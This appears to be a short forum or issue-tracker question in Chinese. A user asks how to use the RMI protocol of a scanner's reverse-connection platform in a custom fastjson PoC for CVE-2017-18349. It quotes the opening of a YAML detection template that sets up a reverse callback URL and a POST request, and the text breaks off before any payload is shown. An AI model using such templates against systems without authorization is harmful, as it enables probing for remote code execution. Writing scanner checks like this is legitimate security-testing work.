intBJWWW
intBJWWW
在测试自定义fastjson-poc的时候,发现官方文档没有过多的介绍反连平台中的rmi协议,也没有说rmi的地址怎么获取,rmi的地址会自定改变吗?我目前的情况是特定的地址,漏洞的判断条件中能不能加上rmi的响应字段信息,目前我是这样写的 ```yaml name: poc-yaml-fastjson-cve-2017-18349 set: reverse: newReverse() reverseURL: reverse.url reverseURLHost: reverse.url.host rules: - method: POST path: "/" headers: User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type:...